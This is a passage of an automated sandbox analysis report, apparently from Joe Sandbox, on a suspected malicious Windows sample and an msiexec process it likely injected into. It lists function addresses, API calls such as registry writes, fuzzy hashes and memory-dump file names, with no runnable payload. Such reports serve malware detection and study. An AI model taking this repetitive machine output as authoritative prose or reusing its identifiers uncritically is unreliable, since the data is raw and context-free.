Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-2145255484
Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
Instruction ID: e6cb25dffc9e5a2bb3a1dbad45cd46e4450efeecdd43702cab0598af126a0af2
Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
Instruction Fuzzy Hash: 06D05E31211534AAC211AB589D05CDB629C9E46304341442AF241B20A1C779595186FE

Function 0040237B Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
lstrlenW.KERNEL32(0040B5D0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
RegSetValueExW.ADVAPI32(?,?,?,?,0040B5D0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
RegCloseKey.ADVAPI32(?,?,?,0040B5D0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: 1524d7add36cd9fcde37d92f9eca7493f501d411afb00e955b7e8f2a6300b093
Instruction ID: 52a733b9c8e4ab95676b633cdda8f3d85a752b7ae8d5fcc25206d9d14f9091af
Opcode Fuzzy Hash: 1524d7add36cd9fcde37d92f9eca7493f501d411afb00e955b7e8f2a6300b093
Instruction Fuzzy Hash: A4118E71A00108BFEB11AFA5DE89DAE777DEB44358F11403AF904B61D1DBB85E409668

Function 00402D8A Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00403536,?), ref: 00402D9D
GetTickCount.KERNEL32 ref: 00402DBB
CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
ShowWindow.USER32(00000000,00000005,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00403536,?), ref: 00402DE6

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: df109012b7806b8de8df2929ec67b86acfc6093236d2d9f47b9f955c0080d778
Instruction ID: 9565580f91e6c8b036764476f8379a8a9497e0cf8b36b33943f0ae23fa557cda
Opcode Fuzzy Hash: df109012b7806b8de8df2929ec67b86acfc6093236d2d9f47b9f955c0080d778
Instruction Fuzzy Hash: FFF05E30501520BBC671AB20FF4DA9B7B64FB40B11701447AF042B15E4C7B80D828B9C

Function 00405123 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405152
CallWindowProcW.USER32(?,?,?,?), ref: 004051A3

Part of subcall function 00404160: SendMessageW.USER32(00010476,00000000,00000000,00000000), ref: 00404172

Strings

, xrefs: 00405133

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 340d3c0ef1b6191d39bf660b6c525c67a0e16f797af015efc8e2bb8f4ca6604a
Instruction ID: 3a757cf3c9e7612e230a46be1b13aa2d047f9f757cddf2eb8b5381add8f22129
Opcode Fuzzy Hash: 340d3c0ef1b6191d39bf660b6c525c67a0e16f797af015efc8e2bb8f4ca6604a
Instruction Fuzzy Hash: 43017C71A00609ABEB218F51ED84B9B3B2AEB84750F504037F6047D1E0C77A8C929E2A

Function 00403804 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,774D3420,00000000,C:\Users\user\AppData\Local\Temp\,004037DC,004035F2,?), ref: 0040381E
GlobalFree.KERNEL32(?), ref: 00403825

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403804

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-2145255484
Opcode ID: da2816148213eaf2ca9be615ca64e0b95c5ba1132a9b108e3e9160e8cd70995f
Instruction ID: c0ef5988400ca03a2919d730679f4c8cdc7c60ab336a91eb80d60266565c467d
Opcode Fuzzy Hash: da2816148213eaf2ca9be615ca64e0b95c5ba1132a9b108e3e9160e8cd70995f
Instruction Fuzzy Hash: D2E0C2735015309BC6212F45ED0871EB7ACAF59B22F0580BAF8907B26087781C428FD8

Function 00405A50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Kb94RzMYNf.exe,C:\Users\user\Desktop\Kb94RzMYNf.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00403536,?), ref: 00405A56
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Kb94RzMYNf.exe,C:\Users\user\Desktop\Kb94RzMYNf.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00403536,?), ref: 00405A66

Strings

C:\Users\user\Desktop, xrefs: 00405A50

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3080008178
Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
Instruction ID: 94586c4fc4af0aa81d4ff890ae3cf2b30e5be6a9e55ec7b9bf63862dfaa4d6e2
Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
Instruction Fuzzy Hash: 0ED05EB2411920AAC312A714DD44DAF73ACEF123007464466F441A6161D7785D818AAD

Function 00405B8A Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9A
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB2
CharNextA.USER32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC3
lstrlenA.KERNEL32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCC

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
Instruction ID: 8848f7d8d782bbf7f3224fb8fd0babd0dea9e1ab2e05ea72f699364142252924
Opcode Fuzzy Hash: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
Instruction Fuzzy Hash: 72F0C231100914EFCB029FA5CD4099FBFB8EF06350B2540A9E840F7311D674FE019BA8

Analysis Process: msiexec.exePID: 5752, Parent PID: 7988COMMON

Execution Graph

Execution Coverage:	6.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.2%
Total number of Nodes:	72
Total number of Limit Nodes:	8

Executed Functions

Function 000E5321 Relevance: 3.9, Strings: 3, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0o6p, xrefs: 000E53E2
Lj6p, xrefs: 000E5550
Lj6p, xrefs: 000E5566

Memory Dump Source

Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd

Similarity

API ID:
String ID: 0o6p$Lj6p$Lj6p
API String ID: 0-3500687762
Opcode ID: 1e07b61a3eab1d7a72f3c328d15eb0e64e48bcc9b131198343effc8bd6f61e3b
Instruction ID: c1fd22df7886d3e3c4f601c9bf9a3a2d7c06dd5301da32cf6124194037dfe5de
Opcode Fuzzy Hash: 1e07b61a3eab1d7a72f3c328d15eb0e64e48bcc9b131198343effc8bd6f61e3b
Instruction Fuzzy Hash: 4D81B474E00658CFDB54CFAAC884A9DBBF2BF88305F148469E819BB365DB749941CF50

Function 24509548 Relevance: 1.9, APIs: 1, Instructions: 357
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2604105568.0000000024500000.00000040.00000800.00020000.00000000.sdmp, Offset: 24500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24500000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d119060ed229682f5bb0fbc434ef9f4b5c951964dbc1ff95b5cacbf2010d5aea
Instruction ID: dfb9d62e4759f571045e4d649491b6bd67480ef23f33faf39513a480072a0f9c
Opcode Fuzzy Hash: d119060ed229682f5bb0fbc434ef9f4b5c951964dbc1ff95b5cacbf2010d5aea
Instruction Fuzzy Hash: 17F1E274E00218CFDB14DFA9D884B9DBBB2BF88304F50D5AAE848AB355DB749985CF50

Function 000E5370 Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0o6p, xrefs: 000E53E2

Memory Dump Source

Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd

Similarity

API ID:
String ID: 0o6p
API String ID: 0-1274891241
Opcode ID: 05ae47b8266aa1d32ea0a22d4680f870da57eb2fb9ceb0628715614ac7a5a28d
Instruction ID: 0ba0bbe4e3a974056e5d87851fb945e9a11b2426fd29a8f1b2f02cc9dbce4236
Opcode Fuzzy Hash: 05ae47b8266aa1d32ea0a22d4680f870da57eb2fb9ceb0628715614ac7a5a28d
Instruction Fuzzy Hash: B261D374E006489FEB58CFA6C844A9DFBF2BF88301F248469E818BB365DB349941CF50

Function 000EE988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a3c5f47992c125e838340d19f9c31a54c12fec93e73f9d3e356cc0bd053cb97
Instruction ID: d1487d8d0a4d1cb34bef7923685e7c0c45dff9e890aac0e3b229d32edebef899
Opcode Fuzzy Hash: 8a3c5f47992c125e838340d19f9c31a54c12fec93e73f9d3e356cc0bd053cb97
Instruction Fuzzy Hash: 32519474E00248DFEB18DFA6D494A9DBBF2BF89300F248129E815BB365DB349845CF15

Function 000BD044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2581158732.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_bd000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dff7ca19b05b81dfe8f0c2d322e0990a8049dbaf91d77a16bc23597c33d3a0a
Instruction ID: e7b4a37f0322504e8f89a9713ef7f4f8f0ba6f2726950269727d4bb45a064184
Opcode Fuzzy Hash: 5dff7ca19b05b81dfe8f0c2d322e0990a8049dbaf91d77a16bc23597c33d3a0a
Instruction Fuzzy Hash: 5221F571504204EFDB24DF24D9C0B66FBA1FB84314F34C96ED9494B246D77AD846CB62

Function 00424C9A Relevance: 1.7, APIs: 1, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00424EFE

Memory Dump Source

Source File: 00000005.00000002.2581850739.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_msiexec.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4e3152120b996f0b9ade25275ebd429c66221ebb8967fc981fdc269424c5d51b
Instruction ID: a6241f7ae6b9e8374e0b359d44e357c318dc80651c97d10944c0c3eacab803ec
Opcode Fuzzy Hash: 4e3152120b996f0b9ade25275ebd429c66221ebb8967fc981fdc269424c5d51b
Instruction Fuzzy Hash: 15813570A00B158FD724CF2AD44479ABBF1FF88304F108A2ED48AD7A51D779E94ACB95

Function 0042538C Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 004273A2

Memory Dump Source

Source File: 00000005.00000002.2581850739.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_msiexec.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 3d6a2b84f8a10de8dce2f844ef41c4bbe01480c727e2b4cad206134c8b8e869c
Instruction ID: 6e8f9e10e6339eeca8015348cd136a9f1762c4efd14a548c2b4ad1cab0c3cb02
Opcode Fuzzy Hash: 3d6a2b84f8a10de8dce2f844ef41c4bbe01480c727e2b4cad206134c8b8e869c
Instruction Fuzzy Hash: 3951D1B1D04359DFDB14CF9AD884ADEBBB5BF48310F64812AE818AB210D774A885CF94

Function 004254DC Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 00429911

Memory Dump Source

Source File: 00000005.00000002.2581850739.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_msiexec.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 8931c6b234197ad37c2c7c4f45ae132a7e44105ac1300458caac261e3e9e19ad
Instruction ID: b94842cbb575940af86ab33c0a533794738fc60733484bc6eeba2e370c833e03
Opcode Fuzzy Hash: 8931c6b234197ad37c2c7c4f45ae132a7e44105ac1300458caac261e3e9e19ad
Instruction Fuzzy Hash: 65414AB5A00219CFCB18CF59C448BAABBF5FF89310F24C459E419AB321D374A841CBA4

Function 2450992C Relevance: 1.6, APIs: 1, Instructions: 62
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 24509A6E

Memory Dump Source

Source File: 00000005.00000002.2604105568.0000000024500000.00000040.00000800.00020000.00000000.sdmp, Offset: 24500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24500000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: de8208ce9c0a54e035f8e1072af6b3c147202e913247d1cc32139b324d0757bc
Instruction ID: 99c7639a8b1938d5e6605fa859a3179a384f5df4c94e3187697bc2bedc24b106
Opcode Fuzzy Hash: de8208ce9c0a54e035f8e1072af6b3c147202e913247d1cc32139b324d0757bc
Instruction Fuzzy Hash: 43117C78E042098FDB04DFA8D884EEDB7B9FFD8314F10D565E884A724AD734A941DB50

Function 00424F32 Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00424EFE

Memory Dump Source

Source File: 00000005.00000002.2581850739.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_msiexec.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: fc6a7c3ee70fb8c98b3287b8218266d3dec35c3369cb305ed23eeab94d9270d9
Instruction ID: f0902ae682c6ab807c4a51f4eaa2dd369fcc256b0c5446d14c417678bedd9bbe
Opcode Fuzzy Hash: fc6a7c3ee70fb8c98b3287b8218266d3dec35c3369cb305ed23eeab94d9270d9
Instruction Fuzzy Hash: 8C115AB69043598FDB11CF59E0403DABBF0FF85324F15819BC459AB612C379990ACFA5

Function 00424E98 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00424EFE

Memory Dump Source

Source File: 00000005.00000002.2581850739.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_msiexec.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3c845f04f10da2fa9f3b89945c0ce348cbbea60cabe61254045c582d8d9e5e01
Instruction ID: a3d46eb4c8c3722dc6ab29e9619a708d5ec11690cc3669b09420600d5ed7ab94
Opcode Fuzzy Hash: 3c845f04f10da2fa9f3b89945c0ce348cbbea60cabe61254045c582d8d9e5e01
Instruction Fuzzy Hash: 0C1113B6D002598FDB20CF9AD444BDEFBF4EF88314F10841AD818A7600C379A545CFA5

Function 0042AF78 Relevance: 1.5, APIs: 1, Instructions: 46
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 0042BDED

Memory Dump Source

Source File: 00000005.00000002.2581850739.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_msiexec.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: d0f1c10191c470806f836cf73f96c7d362d0c60fa842ded47f8badb259a873af
Instruction ID: cb70ecc5b5ad34f1cb514aa4f0c55591d5306ff3059c25e3213df9693b0035a8
Opcode Fuzzy Hash: d0f1c10191c470806f836cf73f96c7d362d0c60fa842ded47f8badb259a873af
Instruction Fuzzy Hash: D31115B59047588FDB20DF9AE444BDEFBF4EB48310F20845AD958A7300D379A944CFA5

Function 000E5362 Relevance: 1.4, Strings: 1, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0o6p, xrefs: 000E53E2

Memory Dump Source

Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd

Similarity

API ID:
String ID: 0o6p
API String ID: 0-1274891241
Opcode ID: 133ce5c21dac8d49fbc5aa32d7aec177539b94c9ebd8e773b3fb6306a4acdbfc
Instruction ID: 508a1151c337922f65e0f7f8eddba59c987eaaf9439e1f23b370301b14b94181
Opcode Fuzzy Hash: 133ce5c21dac8d49fbc5aa32d7aec177539b94c9ebd8e773b3fb6306a4acdbfc
Instruction Fuzzy Hash: F251C074E006488FDB54DFA6C884A9DFBF2BF89305F209469E819BB365DB349885CF10

Function 000EE018 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5714e0d3839435f6a157b8c704914beb10a69a095123a92ef04be0b4b19ad01
Instruction ID: 19a31a180f6f47e194bf94f42f5896a3b8e4eb0732511a034e223b31feb6a0b0
Opcode Fuzzy Hash: b5714e0d3839435f6a157b8c704914beb10a69a095123a92ef04be0b4b19ad01
Instruction Fuzzy Hash: A212ADB80A5296CFE240AF76D5BC16E7F60FFAF3533246D02E10B84465EB798445CB26

Function 000E0C8F Relevance: .5, Instructions: 545COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b63cfecc7a630604acc5e7196fa73a9d590d4959bb2b7889b53eb5cbf859cc98
Instruction ID: 1e8c6c02791df71b96e11f035ef000934387836a5c1e2e7eed0c2fcaf6c6f21d
Opcode Fuzzy Hash: b63cfecc7a630604acc5e7196fa73a9d590d4959bb2b7889b53eb5cbf859cc98
Instruction Fuzzy Hash: F8520874A40219CFDB58DF64DC88B8DB7B6FB88301F1086A5D80AAB368DB746D85CF51

Function 000E0CA0 Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f10c190961019e7ae142b9564797891daac0556dd1593d6507ffe1b404c8e243
